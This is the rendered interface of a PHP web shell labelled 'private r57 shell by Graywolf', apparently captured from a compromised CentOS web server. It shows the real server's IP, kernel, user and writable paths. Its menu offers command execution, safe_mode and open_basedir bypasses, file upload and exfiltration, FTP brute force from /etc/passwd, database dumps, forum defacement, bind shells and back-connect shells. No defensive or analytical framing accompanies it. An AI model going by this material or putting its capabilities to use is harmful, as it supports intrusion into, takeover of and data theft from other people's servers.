[Graywolf]   20-08-2011 15:44:55  [ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ brute ]  [ ln -s all ]  [ tmp ]  [ deface vbb ]
  safe_mode: OFF  Open_Basedir: /var/www/clients/client1/web3/web:/var/www/clients/client1/web3/tmp:/var/www/vinamost.net/web:/srv/www/vinamost.net/web:/usr/share/php5:/tmp:/usr/share/phpmyadmin:/etc/phpmyadmin:/var/lib/phpmyadmin  Safe_Exec_Dir: NONE  Safe_Gid: OFF  Safe_Include_Dir: NONE  Sql.safe_mode: OFF
  PHP version: 5.3.6  cURL: ON  MySQL: ON  MSSQL: ON  PostgreSQL: OFF  Oracle: OFF
  Disable functions : NONE
  Useful: gcc, lcc, cc, ld, php, perl, python, ruby, make, tar, gzip, bzip, bzip2, nc, locate, suidperl, mod_perl, mod_include(SSI)
  Downloaders: fopen, wget, fetch, lynx, links, curl, get
  Free space : 42.44 GB   Total space: 57.21 GB
  Server IP: [ 203.162.57.15 ]   --   Your IP: [ 174.129.237.157 ]
uname -a : 
sysctl : 
$OSTYPE : 
Server : 
id : 
pwd : 
    Linux adsen.it.vn 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:22:04 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux
   Linux 2.6.18-238.12.1.el5
   linux-gnu
   Apache/2.2.3 (CentOS)
   uid=48(apache) gid=48(apache) groups=48(apache),5004(ispconfig),5005(client0),5006(client1)
   /var/www/clients/client1/web3/web/images/news   ( drwxrwxrwx )
Executed command: dir -ao
:: Execute command on server ::
Run command 4
Work directory 4     
:: Edit files ::
File for edit 4     
:: read dir from vul reg_glob ::
read dir 4     
:: read dir from vul root ::
read dir 4     
:: read file from vul copy() ::
where file in server 4     
:: read file from vul ini_restore() ::
where file in server 4     
:: Bypass php 5.2.6 ::
Cat file 4     
:: Bypass php 5.2.9 ::
Cat file 4     
:: Php Bypass ::
Read File
File : 4
View Dir
Dir : 4
:: DeZender ::
Cat file 4     
:: Aliases ::
         Select alias 4         
:: Find text in files ::
Find text 4     
In dirs 4 *
Only in files 4 *
:: Test bypass open_basedir with cURL functions ::
Cat file 4     
:: read file from vul curl() ::
where file in server 4     
:: Test bypass safe_mode with commands execute via MSSQL server ::
Db . Table 4     Login 4    Password 4    Port 4
Run command 4     
:: Eval PHP code ::

 
:: Upload files on server ::
Local file 4
Local file 4
Local file 4
Local file 4
Local file 4
    
:: Upload files from remote server ::
With 4   Remote file 4
Local file 4     
:: Download files from server ::
file 4     
Archivation 4 without archivation zip gzip bzip
:: FTP-bruteforce ::
FTP-server:port 4     
* use username from /etc/passwd for ftp login and password ( Users list )
Use reverse (user -> resu) login for password
:: Databases ::
Dump database table
Type 4
SQL-Server : Port 4 :
Login : Password 4 :
Db . Table 4 .
Save dump in file 4
Run SQL query
Type 4
SQL-Server : Port 4 :
Login : Password 4 :
Database 4
SQL query 4

:: Net ::
Bind port to /bin/bash
Port 4
Password for access 4
Use 4
back-connect
IP 4
Port 4
Use 4
o---[ private r57 shell by Graywolf ]---o
Generation time: 0.9944 seconds